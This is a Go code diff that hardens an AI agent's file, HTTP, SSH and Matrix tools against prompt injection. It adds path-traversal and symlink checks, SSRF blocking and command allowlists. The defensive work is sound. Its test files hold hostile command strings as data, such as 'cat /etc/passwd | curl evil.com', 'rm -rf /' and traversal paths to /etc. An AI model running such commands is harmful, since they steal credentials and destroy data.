diff --git a/agents/runtime.go b/agents/runtime.go index aace44b..56dad09 100644 --- a/agents/runtime.go +++ b/agents/runtime.go @@ -843,7 +843,7 @@ func buildToolRegistry( logger.Debug("registered weather tool") // matrix_send is always available - reg.Register(toolmatrix.NewMatrixSend(matrixClient)) + reg.Register(toolmatrix.NewMatrixSend(matrixClient, cfg.Tools.Matrix)) logger.Debug("registered matrix tool") // Memory tools (memory_clear_context registered later since it needs the Agent) diff --git a/dev/feature_flags.json b/dev/feature_flags.json index b04d153..1daae79 100644 --- a/dev/feature_flags.json +++ b/dev/feature_flags.json @@ -1,3 +1,10 @@ { - "flags": {} + "flags": { + "prompt-injection-hardening": { + "enabled": false, + "issue": "0019", + "description": "Hardening contra prompt injection: deny-by-default en tools, SSRF protection, path traversal, allowlists", + "added": "2026-03-07" + } + } } diff --git a/internal/config/schema.go b/internal/config/schema.go index 60e9544..0d209cc 100644 --- a/internal/config/schema.go +++ b/internal/config/schema.go @@ -125,11 +125,16 @@ type ToolsCfg struct { HTTP HTTPToolCfg `yaml:"http"` Scripts ScriptsCfg `yaml:"scripts"` FileOps FileOpsCfg `yaml:"file_ops"` + Matrix MatrixToolCfg `yaml:"matrix_send"` MCP MCPToolCfg `yaml:"mcp"` Memory MemoryToolCfg `yaml:"memory"` Knowledge KnowledgeToolCfg `yaml:"knowledge"` } +type MatrixToolCfg struct { + AllowedRooms []string `yaml:"allowed_rooms"` // if non-empty, only these room IDs can be targeted +} + type KnowledgeToolCfg struct { Enabled bool `yaml:"enabled"` Dir string `yaml:"dir"` // default: "./knowledge" (relative to agent dir) @@ -138,6 +143,7 @@ type KnowledgeToolCfg struct { type SSHToolCfg struct { Enabled bool `yaml:"enabled"` AllowedTargets []string `yaml:"allowed_targets"` + AllowedCommands []string `yaml:"allowed_commands"` // allowlist: if non-empty, only these command prefixes are permitted ForbiddenCommands []string `yaml:"forbidden_commands"` Timeout time.Duration `yaml:"timeout"` MaxConcurrent int `yaml:"max_concurrent"` diff --git a/tools/file/file.go b/tools/file/file.go index 6a38f0d..4c84e3d 100644 --- a/tools/file/file.go +++ b/tools/file/file.go @@ -12,7 +12,8 @@ import ( ) // NewReadFile creates a read_file tool that reads local files. -// Validates paths against cfg.AllowedPaths when non-empty. +// Deny-by-default: if AllowedPaths is empty, all reads are rejected. +// Resolves symlinks and normalizes paths to prevent traversal attacks. func NewReadFile(cfg config.FileOpsCfg) tools.Tool { return tools.Tool{ Def: tools.Def{ @@ -53,18 +54,54 @@ func NewReadFile(cfg config.FileOpsCfg) tools.Tool { } } +// validatePath checks that absPath is under one of the allowed paths. +// Deny-by-default: if allowedPaths is empty, no paths are allowed. +// Resolves symlinks to prevent traversal via ../ or symlink escapes. func validatePath(absPath string, allowedPaths []string) error { if len(allowedPaths) == 0 { - return nil + return fmt.Errorf("read_file: no allowed paths configured, all reads denied") } + + // Resolve symlinks on the requested path to get the real path. + // If the file doesn't exist yet, resolve the parent directory. + realPath, err := resolveReal(absPath) + if err != nil { + return fmt.Errorf("read_file: cannot resolve path %q: %w", absPath, err) + } + for _, allowed := range allowedPaths { a, err := filepath.Abs(allowed) if err != nil { continue } - if strings.HasPrefix(absPath, a) { + // Resolve symlinks on the allowed path too. + realAllowed, err := resolveReal(a) + if err != nil { + continue + } + // Ensure the real path is strictly under the allowed directory. + // Add trailing separator to prevent /opt matching /opt1234. + if strings.HasPrefix(realPath, realAllowed+string(filepath.Separator)) || realPath == realAllowed { return nil } } return fmt.Errorf("path %q not under any allowed path", absPath) } + +// resolveReal resolves symlinks for a path. +// If the exact path doesn't exist, it resolves the deepest existing ancestor +// and appends the remaining segments, preventing partial traversal. +func resolveReal(path string) (string, error) { + real, err := filepath.EvalSymlinks(path) + if err == nil { + return filepath.Clean(real), nil + } + // Path doesn't exist — resolve parent and append base. + parent := filepath.Dir(path) + base := filepath.Base(path) + realParent, err := filepath.EvalSymlinks(parent) + if err != nil { + return "", err + } + return filepath.Clean(filepath.Join(realParent, base)), nil +} diff --git a/tools/file/file_test.go b/tools/file/file_test.go new file mode 100644 index 0000000..647f76c --- /dev/null +++ b/tools/file/file_test.go @@ -0,0 +1,100 @@ +package file + +import ( + "context" + "os" + "path/filepath" + "testing" + + "github.com/enmanuel/agents/internal/config" + "github.com/enmanuel/agents/tools" +) + +func TestNewReadFile_DenyByDefault(t *testing.T) { + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{}}) + result := tool.Exec(context.Background(), map[string]any{"path": "/etc/hosts"}) + if result.Err == nil { + t.Fatal("expected error when AllowedPaths is empty, got nil") + } +} + +func TestNewReadFile_AllowedPath(t *testing.T) { + tmp := t.TempDir() + f := filepath.Join(tmp, "test.txt") + os.WriteFile(f, []byte("hello"), 0644) + + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{tmp}}) + result := tool.Exec(context.Background(), map[string]any{"path": f}) + if result.Err != nil { + t.Fatalf("expected success, got: %v", result.Err) + } + if result.Output != "hello" { + t.Fatalf("expected 'hello', got %q", result.Output) + } +} + +func TestNewReadFile_PathTraversal(t *testing.T) { + tmp := t.TempDir() + // Try to escape via ../ + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{tmp}}) + result := tool.Exec(context.Background(), map[string]any{ + "path": filepath.Join(tmp, "..", "..", "etc", "hosts"), + }) + if result.Err == nil { + t.Fatal("expected error for path traversal, got nil") + } +} + +func TestNewReadFile_PathOutsideAllowed(t *testing.T) { + tmp := t.TempDir() + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{tmp}}) + result := tool.Exec(context.Background(), map[string]any{"path": "/etc/hosts"}) + if result.Err == nil { + t.Fatal("expected error for path outside allowed, got nil") + } +} + +func TestNewReadFile_SymlinkEscape(t *testing.T) { + tmp := t.TempDir() + link := filepath.Join(tmp, "escape") + os.Symlink("/etc", link) + + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{tmp}}) + result := tool.Exec(context.Background(), map[string]any{ + "path": filepath.Join(link, "hosts"), + }) + if result.Err == nil { + t.Fatal("expected error for symlink escape, got nil") + } +} + +func TestNewReadFile_EmptyPath(t *testing.T) { + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{"/tmp"}}) + result := tool.Exec(context.Background(), map[string]any{"path": ""}) + if result.Err == nil { + t.Fatal("expected error for empty path") + } +} + +func TestNewReadFile_PrefixConfusion(t *testing.T) { + // /opt should not match /opt1234 + tool := NewReadFile(config.FileOpsCfg{AllowedPaths: []string{"/opt"}}) + result := tool.Exec(context.Background(), map[string]any{"path": "/opt1234/file.txt"}) + if result.Err == nil { + t.Fatal("expected error: /opt should not match /opt1234") + } +} + +func TestValidatePath_ExactMatch(t *testing.T) { + tmp := t.TempDir() + if err := validatePath(tmp, []string{tmp}); err != nil { + t.Fatalf("exact match should be allowed: %v", err) + } +} + +func TestGetString_MissingKey(t *testing.T) { + val := tools.GetString(map[string]any{}, "missing") + if val != "" { + t.Fatalf("expected empty, got %q", val) + } +} diff --git a/tools/http/http.go b/tools/http/http.go index 3964cb0..b24b4ce 100644 --- a/tools/http/http.go +++ b/tools/http/http.go @@ -4,6 +4,7 @@ import ( "context" "fmt" "io" + "net" "net/http" "net/url" "strings" @@ -14,7 +15,8 @@ import ( ) // NewHTTPGet creates an http_get tool that performs GET requests. -// Validates URLs against cfg.AllowedDomains when non-empty. +// Validates URLs against cfg.AllowedDomains (deny-by-default if non-empty) +// and blocks requests to internal/private IP ranges (SSRF protection). func NewHTTPGet(cfg config.HTTPToolCfg) tools.Tool { timeout := cfg.Timeout if timeout == 0 { @@ -35,8 +37,8 @@ func NewHTTPGet(cfg config.HTTPToolCfg) tools.Tool { if rawURL == "" { return tools.Result{Err: fmt.Errorf("http_get: url is required")} } - if err := validateDomain(rawURL, cfg.AllowedDomains); err != nil { - return tools.Result{Err: err} + if err := validateURL(rawURL, cfg.AllowedDomains); err != nil { + return tools.Result{Err: fmt.Errorf("http_get: %w", err)} } req, err := http.NewRequestWithContext(ctx, http.MethodGet, rawURL, nil) @@ -61,7 +63,7 @@ func NewHTTPGet(cfg config.HTTPToolCfg) tools.Tool { } // NewHTTPPost creates an http_post tool that performs POST requests with a JSON body. -// Validates URLs against cfg.AllowedDomains when non-empty. +// Validates URLs against cfg.AllowedDomains and blocks internal IPs. func NewHTTPPost(cfg config.HTTPToolCfg) tools.Tool { timeout := cfg.Timeout if timeout == 0 { @@ -87,8 +89,8 @@ func NewHTTPPost(cfg config.HTTPToolCfg) tools.Tool { if bodyStr == "" { return tools.Result{Err: fmt.Errorf("http_post: body is required")} } - if err := validateDomain(rawURL, cfg.AllowedDomains); err != nil { - return tools.Result{Err: err} + if err := validateURL(rawURL, cfg.AllowedDomains); err != nil { + return tools.Result{Err: fmt.Errorf("http_post: %w", err)} } req, err := http.NewRequestWithContext(ctx, http.MethodPost, rawURL, strings.NewReader(bodyStr)) @@ -113,21 +115,84 @@ func NewHTTPPost(cfg config.HTTPToolCfg) tools.Tool { } } -// validateDomain checks that the URL's host is in the allowed list. -// If allowedDomains is empty, all domains are allowed. -func validateDomain(rawURL string, allowedDomains []string) error { - if len(allowedDomains) == 0 { - return nil - } +// validateURL checks domain allowlist and blocks internal IPs (SSRF protection). +func validateURL(rawURL string, allowedDomains []string) error { u, err := url.Parse(rawURL) if err != nil { return fmt.Errorf("invalid url: %w", err) } + host := u.Hostname() + if host == "" { + return fmt.Errorf("url has no host") + } + + // SSRF protection: block internal/private IPs and localhost. + if err := rejectInternalHost(host); err != nil { + return err + } + + // Domain allowlist (if configured). + if err := validateDomain(host, allowedDomains); err != nil { + return err + } + + return nil +} + +// validateDomain checks that the host is in the allowed list. +// If allowedDomains is empty, all domains are allowed. +func validateDomain(host string, allowedDomains []string) error { + if len(allowedDomains) == 0 { + return nil + } + lower := strings.ToLower(host) for _, d := range allowedDomains { - if host == d { + if lower == strings.ToLower(d) { return nil } } return fmt.Errorf("domain %q not in allowed list", host) } + +// rejectInternalHost blocks requests to localhost, private IPs, and link-local addresses. +func rejectInternalHost(host string) error { + lower := strings.ToLower(host) + if lower == "localhost" { + return fmt.Errorf("requests to localhost are blocked") + } + + ip := net.ParseIP(host) + if ip == nil { + // Not an IP literal — could be a domain. Resolve it. + ips, err := net.LookupIP(host) + if err != nil { + return nil // let the HTTP client handle DNS errors + } + for _, resolved := range ips { + if isPrivateIP(resolved) { + return fmt.Errorf("domain %q resolves to private IP %s", host, resolved) + } + } + return nil + } + + if isPrivateIP(ip) { + return fmt.Errorf("requests to private IP %s are blocked", ip) + } + return nil +} + +// isPrivateIP returns true for loopback, private, link-local, and metadata IPs. +func isPrivateIP(ip net.IP) bool { + return ip.IsLoopback() || + ip.IsPrivate() || + ip.IsLinkLocalUnicast() || + ip.IsLinkLocalMulticast() || + isMetadataIP(ip) +} + +// isMetadataIP checks for cloud metadata service IPs (169.254.169.254). +func isMetadataIP(ip net.IP) bool { + return ip.Equal(net.ParseIP("169.254.169.254")) +} diff --git a/tools/http/http_test.go b/tools/http/http_test.go new file mode 100644 index 0000000..77e2bde --- /dev/null +++ b/tools/http/http_test.go @@ -0,0 +1,124 @@ +package http + +import ( + "net" + "testing" +) + +func TestValidateDomain_EmptyAllowed(t *testing.T) { + if err := validateDomain("example.com", nil); err != nil { + t.Fatalf("empty list should allow all: %v", err) + } +} + +func TestValidateDomain_Allowed(t *testing.T) { + if err := validateDomain("api.example.com", []string{"api.example.com"}); err != nil { + t.Fatalf("should be allowed: %v", err) + } +} + +func TestValidateDomain_Denied(t *testing.T) { + if err := validateDomain("evil.com", []string{"api.example.com"}); err == nil { + t.Fatal("should be denied") + } +} + +func TestValidateDomain_CaseInsensitive(t *testing.T) { + if err := validateDomain("API.Example.COM", []string{"api.example.com"}); err != nil { + t.Fatalf("should be case-insensitive: %v", err) + } +} + +func TestRejectInternalHost_Localhost(t *testing.T) { + if err := rejectInternalHost("localhost"); err == nil { + t.Fatal("localhost should be blocked") + } +} + +func TestRejectInternalHost_Loopback(t *testing.T) { + if err := rejectInternalHost("127.0.0.1"); err == nil { + t.Fatal("loopback should be blocked") + } +} + +func TestRejectInternalHost_IPv6Loopback(t *testing.T) { + if err := rejectInternalHost("::1"); err == nil { + t.Fatal("IPv6 loopback should be blocked") + } +} + +func TestRejectInternalHost_PrivateA(t *testing.T) { + if err := rejectInternalHost("10.0.0.1"); err == nil { + t.Fatal("10.x should be blocked") + } +} + +func TestRejectInternalHost_PrivateB(t *testing.T) { + if err := rejectInternalHost("172.16.0.1"); err == nil { + t.Fatal("172.16.x should be blocked") + } +} + +func TestRejectInternalHost_PrivateC(t *testing.T) { + if err := rejectInternalHost("192.168.1.1"); err == nil { + t.Fatal("192.168.x should be blocked") + } +} + +func TestRejectInternalHost_LinkLocal(t *testing.T) { + if err := rejectInternalHost("169.254.1.1"); err == nil { + t.Fatal("link-local should be blocked") + } +} + +func TestRejectInternalHost_Metadata(t *testing.T) { + if err := rejectInternalHost("169.254.169.254"); err == nil { + t.Fatal("metadata IP should be blocked") + } +} + +func TestRejectInternalHost_PublicIP(t *testing.T) { + if err := rejectInternalHost("8.8.8.8"); err != nil { + t.Fatalf("public IP should be allowed: %v", err) + } +} + +func TestIsPrivateIP(t *testing.T) { + cases := []struct { + ip string + want bool + }{ + {"127.0.0.1", true}, + {"10.0.0.1", true}, + {"172.16.0.1", true}, + {"192.168.0.1", true}, + {"169.254.169.254", true}, + {"8.8.8.8", false}, + {"1.1.1.1", false}, + } + for _, c := range cases { + ip := net.ParseIP(c.ip) + got := isPrivateIP(ip) + if got != c.want { + t.Errorf("isPrivateIP(%s) = %v, want %v", c.ip, got, c.want) + } + } +} + +func TestValidateURL_Valid(t *testing.T) { + if err := validateURL("https://example.com/api", nil); err != nil { + t.Fatalf("public URL should pass: %v", err) + } +} + +func TestValidateURL_InternalIP(t *testing.T) { + if err := validateURL("http://127.0.0.1:8080/admin", nil); err == nil { + t.Fatal("internal IP in URL should be blocked") + } +} + +func TestValidateURL_NoHost(t *testing.T) { + if err := validateURL("file:///etc/passwd", nil); err == nil { + t.Fatal("URL with no host should be rejected") + } +} diff --git a/tools/matrix/matrix.go b/tools/matrix/matrix.go index 7a15f70..56e82ab 100644 --- a/tools/matrix/matrix.go +++ b/tools/matrix/matrix.go @@ -4,6 +4,7 @@ import ( "context" "fmt" + "github.com/enmanuel/agents/internal/config" "github.com/enmanuel/agents/tools" ) @@ -15,7 +16,8 @@ type MatrixSender interface { } // NewMatrixSend creates a matrix_send tool that sends a message to a Matrix room. -func NewMatrixSend(sender MatrixSender) tools.Tool { +// If AllowedRooms is configured, only those room IDs can be targeted. +func NewMatrixSend(sender MatrixSender, cfg config.MatrixToolCfg) tools.Tool { return tools.Tool{ Def: tools.Def{ Name: "matrix_send", @@ -32,6 +34,10 @@ func NewMatrixSend(sender MatrixSender) tools.Tool { return tools.Result{Err: fmt.Errorf("matrix_send: room_id and message are required")} } + if err := validateRoom(roomID, cfg.AllowedRooms); err != nil { + return tools.Result{Err: err} + } + if err := sender.SendMarkdown(ctx, roomID, message); err != nil { return tools.Result{Err: fmt.Errorf("matrix_send: %w", err)} } @@ -40,3 +46,17 @@ func NewMatrixSend(sender MatrixSender) tools.Tool { }, } } + +// validateRoom checks that roomID is in the allowed list. +// If allowedRooms is empty, all rooms are allowed. +func validateRoom(roomID string, allowedRooms []string) error { + if len(allowedRooms) == 0 { + return nil + } + for _, r := range allowedRooms { + if roomID == r { + return nil + } + } + return fmt.Errorf("matrix_send: room %q not in allowed rooms list", roomID) +} diff --git a/tools/matrix/matrix_test.go b/tools/matrix/matrix_test.go new file mode 100644 index 0000000..49b9777 --- /dev/null +++ b/tools/matrix/matrix_test.go @@ -0,0 +1,23 @@ +package matrix + +import "testing" + +func TestValidateRoom_EmptyAllowed(t *testing.T) { + if err := validateRoom("!any:server.com", nil); err != nil { + t.Fatalf("empty list should allow all: %v", err) + } +} + +func TestValidateRoom_Allowed(t *testing.T) { + rooms := []string{"!abc:server.com", "!def:server.com"} + if err := validateRoom("!abc:server.com", rooms); err != nil { + t.Fatalf("room should be allowed: %v", err) + } +} + +func TestValidateRoom_Denied(t *testing.T) { + rooms := []string{"!abc:server.com"} + if err := validateRoom("!evil:server.com", rooms); err == nil { + t.Fatal("room should be denied") + } +} diff --git a/tools/ssh/ssh.go b/tools/ssh/ssh.go index 77b7769..620f075 100644 --- a/tools/ssh/ssh.go +++ b/tools/ssh/ssh.go @@ -12,7 +12,9 @@ import ( ) // NewSSHCommand creates an ssh_command tool that executes remote commands via SSH. -// Validates targets against cfg.AllowedTargets and commands against cfg.ForbiddenCommands. +// Validates targets against AllowedTargets (deny-by-default if non-empty), +// commands against AllowedCommands allowlist (if non-empty, only those prefixes permitted), +// and against ForbiddenCommands blocklist as a second defense layer. func NewSSHCommand(cfg config.SSHToolCfg, exec *shellssh.Executor) tools.Tool { return tools.Tool{ Def: tools.Def{ @@ -33,7 +35,13 @@ func NewSSHCommand(cfg config.SSHToolCfg, exec *shellssh.Executor) tools.Tool { if err := validateTarget(target, cfg.AllowedTargets); err != nil { return tools.Result{Err: err} } - if err := validateCommand(command, cfg.ForbiddenCommands); err != nil { + if err := validateAllowedCommand(command, cfg.AllowedCommands); err != nil { + return tools.Result{Err: err} + } + if err := validateForbiddenCommand(command, cfg.ForbiddenCommands); err != nil { + return tools.Result{Err: err} + } + if err := validateCommandSyntax(command); err != nil { return tools.Result{Err: err} } @@ -73,7 +81,23 @@ func validateTarget(target string, allowed []string) error { return fmt.Errorf("ssh target %q not in allowed list", target) } -func validateCommand(command string, forbidden []string) error { +// validateAllowedCommand checks that the command starts with one of the allowed prefixes. +// If the allowlist is empty, all commands pass this check (blocklist still applies). +func validateAllowedCommand(command string, allowed []string) error { + if len(allowed) == 0 { + return nil + } + lower := strings.ToLower(command) + for _, a := range allowed { + if strings.HasPrefix(lower, strings.ToLower(a)) { + return nil + } + } + return fmt.Errorf("ssh command not in allowed commands list") +} + +// validateForbiddenCommand checks that the command does not contain any forbidden patterns. +func validateForbiddenCommand(command string, forbidden []string) error { lower := strings.ToLower(command) for _, f := range forbidden { if strings.Contains(lower, strings.ToLower(f)) { @@ -82,3 +106,25 @@ func validateCommand(command string, forbidden []string) error { } return nil } + +// validateCommandSyntax rejects commands with suspicious shell constructs +// that could be used to bypass restrictions: pipes to external services, +// subshells, and output redirection. +func validateCommandSyntax(command string) error { + suspicious := []string{ + "|", // pipe (can exfiltrate output) + "$(", // command substitution + "`", // backtick substitution + ">>", // append redirection + ">", // output redirection + "&&", // command chaining + "||", // command chaining + ";", // command separator + } + for _, s := range suspicious { + if strings.Contains(command, s) { + return fmt.Errorf("ssh command contains disallowed shell syntax %q", s) + } + } + return nil +} diff --git a/tools/ssh/ssh_test.go b/tools/ssh/ssh_test.go new file mode 100644 index 0000000..c2f8db1 --- /dev/null +++ b/tools/ssh/ssh_test.go @@ -0,0 +1,102 @@ +package ssh + +import "testing" + +func TestValidateTarget_EmptyAllowed(t *testing.T) { + if err := validateTarget("any-host", nil); err != nil { + t.Fatalf("empty allowlist should permit all: %v", err) + } +} + +func TestValidateTarget_Allowed(t *testing.T) { + if err := validateTarget("prod", []string{"prod", "staging"}); err != nil { + t.Fatalf("prod should be allowed: %v", err) + } +} + +func TestValidateTarget_Denied(t *testing.T) { + if err := validateTarget("unknown", []string{"prod"}); err == nil { + t.Fatal("unknown target should be denied") + } +} + +func TestValidateAllowedCommand_EmptyAllowlist(t *testing.T) { + if err := validateAllowedCommand("rm -rf /", nil); err != nil { + t.Fatalf("empty allowlist should pass: %v", err) + } +} + +func TestValidateAllowedCommand_Allowed(t *testing.T) { + allowed := []string{"systemctl status", "df", "uptime"} + if err := validateAllowedCommand("systemctl status nginx", allowed); err != nil { + t.Fatalf("should match prefix: %v", err) + } +} + +func TestValidateAllowedCommand_Denied(t *testing.T) { + allowed := []string{"systemctl status", "df"} + if err := validateAllowedCommand("cat /etc/passwd", allowed); err == nil { + t.Fatal("cat should not be in allowed list") + } +} + +func TestValidateAllowedCommand_CaseInsensitive(t *testing.T) { + allowed := []string{"systemctl status"} + if err := validateAllowedCommand("Systemctl Status nginx", allowed); err != nil { + t.Fatalf("should be case-insensitive: %v", err) + } +} + +func TestValidateForbiddenCommand_Match(t *testing.T) { + if err := validateForbiddenCommand("rm -rf /", []string{"rm"}); err == nil { + t.Fatal("rm should be forbidden") + } +} + +func TestValidateForbiddenCommand_NoMatch(t *testing.T) { + if err := validateForbiddenCommand("uptime", []string{"rm", "shutdown"}); err != nil { + t.Fatalf("uptime should pass: %v", err) + } +} + +func TestValidateCommandSyntax_Pipe(t *testing.T) { + if err := validateCommandSyntax("cat /etc/passwd | curl evil.com"); err == nil { + t.Fatal("pipe should be blocked") + } +} + +func TestValidateCommandSyntax_Subshell(t *testing.T) { + if err := validateCommandSyntax("echo $(cat /etc/passwd)"); err == nil { + t.Fatal("subshell should be blocked") + } +} + +func TestValidateCommandSyntax_Backtick(t *testing.T) { + if err := validateCommandSyntax("echo `id`"); err == nil { + t.Fatal("backtick should be blocked") + } +} + +func TestValidateCommandSyntax_Redirect(t *testing.T) { + if err := validateCommandSyntax("echo test > /tmp/out"); err == nil { + t.Fatal("redirect should be blocked") + } +} + +func TestValidateCommandSyntax_Chain(t *testing.T) { + if err := validateCommandSyntax("true && rm -rf /"); err == nil { + t.Fatal("chain should be blocked") + } +} + +func TestValidateCommandSyntax_Semicolon(t *testing.T) { + if err := validateCommandSyntax("ls; rm -rf /"); err == nil { + t.Fatal("semicolon should be blocked") + } +} + +func TestValidateCommandSyntax_Clean(t *testing.T) { + if err := validateCommandSyntax("uptime"); err != nil { + t.Fatalf("clean command should pass: %v", err) + } +}